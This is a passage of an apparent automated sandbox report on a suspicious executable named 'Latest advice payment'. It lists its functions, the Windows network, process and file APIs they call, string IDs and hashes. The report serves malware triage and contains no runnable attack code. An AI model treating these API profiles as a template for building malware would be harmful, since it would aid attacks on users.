                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: a16912c9d591eb8b0eaf80e95c6b2cd68c409024d2edd593558c9fbdb5c73293
                                                            • Instruction ID: f44f1b0ef7a76e9f58440faf243b9c9fbc437a0850c31d3d2627d07347d6e08c
                                                            • Opcode Fuzzy Hash: a16912c9d591eb8b0eaf80e95c6b2cd68c409024d2edd593558c9fbdb5c73293
                                                            • Instruction Fuzzy Hash: 74616E70608712AFD720DF58D888F6ABBE8BF85754F04491AF9819B391DB70ED44CB92
                                                            Function 005D5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 005D5793
                                                            • inet_addr.WSOCK32(?,?,?), ref: 005D57D8
                                                            • gethostbyname.WSOCK32(?), ref: 005D57E4
                                                            • IcmpCreateFile.IPHLPAPI ref: 005D57F2
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005D5862
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005D5878
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 005D58ED
                                                            • WSACleanup.WSOCK32 ref: 005D58F3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 7a523e7c28ab5d14a69c33582d82ee553663262bacdd577b926c002ace78f41d
                                                            • Instruction ID: 7946eda2ace54c2f5cfac9ae64f09240e1683ba524054151a756c6eda7e8e9e1
                                                            • Opcode Fuzzy Hash: 7a523e7c28ab5d14a69c33582d82ee553663262bacdd577b926c002ace78f41d
                                                            • Instruction Fuzzy Hash: 63515E716046019FD7209F28DC89B6A7FE4FB44710F14492BF996DB3A1EB30E904EB41
                                                            Function 005CB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 005CB4D0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 005CB546
                                                            • GetLastError.KERNEL32 ref: 005CB550
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 005CB5BD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 6a3c973f6f2d2ce48c4098b1a003ea63858589448cb0ce74f299dc265e7c8c48
                                                            • Instruction ID: 4a14db0eb0640fda001f10089b7b92f1d95282d935c0d074a660b008f28d86ab
                                                            • Opcode Fuzzy Hash: 6a3c973f6f2d2ce48c4098b1a003ea63858589448cb0ce74f299dc265e7c8c48
                                                            • Instruction Fuzzy Hash: C131B235E4020ADFDB00DFA8C88AFAD7FB4FF48310F144029E5019B291EB719A46CB50
                                                            Function 005B8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 005B9014
                                                            • GetDlgCtrlID.USER32 ref: 005B901F
                                                            • GetParent.USER32 ref: 005B903B
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 005B903E
                                                            • GetDlgCtrlID.USER32(?), ref: 005B9047
                                                            • GetParent.USER32(?), ref: 005B9063
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 005B9066
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 6607cd5d2bf0b604f4b2df45bc549ce91cbaf61fcca5b216713a0630674015cd
                                                            • Instruction ID: 3787299920ac0b2e986e6e7909c46266883b8e1d48eb1e1c5cc634b89d433553
                                                            • Opcode Fuzzy Hash: 6607cd5d2bf0b604f4b2df45bc549ce91cbaf61fcca5b216713a0630674015cd
                                                            • Instruction Fuzzy Hash: 5821D374A00149BBDF04ABA0CC89EFEBF75FF99310F104169B961972A1DF755819DB20
                                                            Function 005B907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005B90FD
                                                            • GetDlgCtrlID.USER32 ref: 005B9108
                                                            • GetParent.USER32 ref: 005B9124
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 005B9127
                                                            • GetDlgCtrlID.USER32(?), ref: 005B9130
                                                            • GetParent.USER32(?), ref: 005B914C
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 005B914F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 7efdccf813be5020709e0e2d6cbb0a669172f8a41c80601d14cbc448a4be67fd
                                                            • Instruction ID: 668a7c8cb2082ce9c92d85fe51f0662717fb0a1ef2e26e2ffc593da9e901060d
                                                            • Opcode Fuzzy Hash: 7efdccf813be5020709e0e2d6cbb0a669172f8a41c80601d14cbc448a4be67fd
                                                            • Instruction Fuzzy Hash: 95210774A00149BBDF04ABA4CC89EFEBF74FF98300F104059FA51972A2DB755819EB20
                                                            Function 005B9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 005B916F
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 005B9184
                                                            • _wcscmp.LIBCMT ref: 005B9196
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005B9211
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: 91a7a4390dc703ac88ca47b982a9009e566f83ff95cfd43b9ef975c56c2e468f
                                                            • Instruction ID: 2c4c06a930305dd039b1bff2a92e4648c7b3885a48692e6d3dc213f273df2132
                                                            • Opcode Fuzzy Hash: 91a7a4390dc703ac88ca47b982a9009e566f83ff95cfd43b9ef975c56c2e468f
                                                            • Instruction Fuzzy Hash: 07110A3E68C307BAFA153624EC0ADF77F9DBB55720F200466FE00A40D1EE6178556A54
                                                            Function 005C7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 005C7A6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ArraySafeVartype
                                                            • String ID:
                                                            • API String ID: 1725837607-0
                                                            • Opcode ID: 90b41ef2ff48aa4955663b4a39ec788a21e02068af5b7a2d11cdd91d11e668cb
                                                            • Instruction ID: 2496f82eb122fe64e78f088a5f7a9a7c0940c57a591e050b6897b86faa054b44
                                                            • Opcode Fuzzy Hash: 90b41ef2ff48aa4955663b4a39ec788a21e02068af5b7a2d11cdd91d11e668cb
                                                            • Instruction Fuzzy Hash: 8DB1697190420A9FDB00DFE4C885BBEBBB8FF49321F204429E941AB691D734AD45DF90
                                                            Function 0056FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0056FAA6
                                                            • OleUninitialize.OLE32(?,00000000), ref: 0056FB45
                                                            • UnregisterHotKey.USER32(?), ref: 0056FC9C
                                                            • DestroyWindow.USER32(?), ref: 005A45D6
                                                            • FreeLibrary.KERNEL32(?), ref: 005A463B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005A4668
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: f0e40edf7a27a674db9b85cb9ee8760ec2dd6e3485b43cb9caf95d0dda84e5ea
                                                            • Instruction ID: 1c00bae4521230657c27ac7d2f0101a74d183a5856446f7e7b9c16c59da8859e
                                                            • Opcode Fuzzy Hash: f0e40edf7a27a674db9b85cb9ee8760ec2dd6e3485b43cb9caf95d0dda84e5ea
                                                            • Instruction Fuzzy Hash: 0DA18E30701212CFDB29EF54D599A6DFB64BF96700F1446ADE80AAB261DB30ED16CF50
                                                            Function 005D9113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: ,,_$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-3331404921
                                                            • Opcode ID: 8eb00b87b386b451ccbbbdb7071d0fdb1ab9216672de2af8dcae83ffecb96618
                                                            • Instruction ID: dc8e4e246d61fc28a10c88bf9aacaac003c6af6d862930c4613bff04927a5077
                                                            • Opcode Fuzzy Hash: 8eb00b87b386b451ccbbbdb7071d0fdb1ab9216672de2af8dcae83ffecb96618
                                                            • Instruction Fuzzy Hash: E1915D71A00219ABDF24DFA9C848FAEBFB8FF85714F10855BE515AB280D7709945CBA0
                                                            Function 005BA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumChildWindows.USER32(?,005BA439), ref: 005BA377
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: c8c2306038afeb5df2d1a1be3d64b83123cc67b25232afdb75b2247de23b0105
                                                            • Instruction ID: 9e0abc10f6d8dc97bd645b1a9d368ff480d434a269d15316917d656d6bddaa4c
                                                            • Opcode Fuzzy Hash: c8c2306038afeb5df2d1a1be3d64b83123cc67b25232afdb75b2247de23b0105
                                                            • Instruction Fuzzy Hash: 0D91C630A04606ABDB08EFA4C486BEEFFB5FF44300F548519E859A7281DF317999CB91
                                                            Function 00562E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00562EAE
                                                              • Part of subcall function 00561DB3: GetClientRect.USER32(?,?), ref: 00561DDC
                                                              • Part of subcall function 00561DB3: GetWindowRect.USER32(?,?), ref: 00561E1D
                                                              • Part of subcall function 00561DB3: ScreenToClient.USER32(?,?), ref: 00561E45
                                                            • GetDC.USER32 ref: 0059CD32
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0059CD45
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0059CD53
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0059CD68
                                                            • ReleaseDC.USER32(?,00000000), ref: 0059CD70
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0059CDFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 02bf063d7cb89f39df1b673bbfc582f25daece05d6879f93ba050c6635bb88a3
                                                            • Instruction ID: 7706f9988047f166b9809840f218af0a8325f6b8a1b4d7a7f29e30f647f0ae6f
                                                            • Opcode Fuzzy Hash: 02bf063d7cb89f39df1b673bbfc582f25daece05d6879f93ba050c6635bb88a3
                                                            • Instruction Fuzzy Hash: B671C031500645DFCF258F64C884ABA7FBAFF49360F14467AED5A9B2A6C7318C41DB60
                                                            Function 005D1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005D1A50
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 005D1A7C
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005D1ABE
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 005D1AD3
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005D1AE0
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005D1B10
                                                            • InternetCloseHandle.WININET(00000000), ref: 005D1B57
                                                              • Part of subcall function 005D2483: GetLastError.KERNEL32(?,?,005D1817,00000000,00000000,00000001), ref: 005D2498
                                                              • Part of subcall function 005D2483: SetEvent.KERNEL32(?,?,005D1817,00000000,00000000,00000001), ref: 005D24AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 2603140658-3916222277
                                                            • Opcode ID: bf5f2f0b8e7743abb24a636826ea27b171948523d4af64252219d27fbf86bbdf
                                                            • Instruction ID: 28382e930f5cb5b2696dc5cb763c43eeadc3166fe68e8672fd9a1ad408627f7c
                                                            • Opcode Fuzzy Hash: bf5f2f0b8e7743abb24a636826ea27b171948523d4af64252219d27fbf86bbdf
                                                            • Instruction Fuzzy Hash: C9419DB1501619BFEB258F54CC89FBA7BACFF58354F00412BFD059A241EB709E449BA4
                                                            Function 005D8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,005EF910), ref: 005D8D28
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,005EF910), ref: 005D8D5C
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 005D8ED6
                                                            • SysFreeString.OLEAUT32(?), ref: 005D8F00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: 78fb07a1fa893fdaa12f2903db6984cc9855c0c145429a9cca3d53198ce27aef
                                                            • Instruction ID: 9267d6d770b701b9adfb284aa94778fb47759b48559a17fca95579474f921f3a
                                                            • Opcode Fuzzy Hash: 78fb07a1fa893fdaa12f2903db6984cc9855c0c145429a9cca3d53198ce27aef
                                                            • Instruction Fuzzy Hash: 44F11B71A00209EFDF14DF98C888EAEBBB9FF89314F10855AF515AB251DB31AE45CB50
                                                            Function 005DF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005DF6B5
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005DF848
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005DF86C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005DF8AC
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005DF8CE
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 005DFA4A
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 005DFA7C
                                                            • CloseHandle.KERNEL32(?), ref: 005DFAAB
                                                            • CloseHandle.KERNEL32(?), ref: 005DFB22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: 8eb3241d2221d9f2b1e1f7bcad3fd5dc8ae29530ea58dfa403947d88032a814b
                                                            • Instruction ID: a625ae0a458855c52e1f2f3af0f62478df9a74c5a77829f115b9852309fb493b
                                                            • Opcode Fuzzy Hash: 8eb3241d2221d9f2b1e1f7bcad3fd5dc8ae29530ea58dfa403947d88032a814b
                                                            • Instruction Fuzzy Hash: 08E18F316042419FC724EF28D895B6ABFE5BF85314F14896EF89A9B3A1CB30DC45CB52
                                                            Function 005C4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005C3697,?), ref: 005C468B
                                                              • Part of subcall function 005C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005C3697,?), ref: 005C46A4
                                                              • Part of subcall function 005C4A31: GetFileAttributesW.KERNEL32(?,005C370B), ref: 005C4A32
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 005C4D40
                                                            • _wcscmp.LIBCMT ref: 005C4D5A
                                                            • MoveFileW.KERNEL32(?,?), ref: 005C4D75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
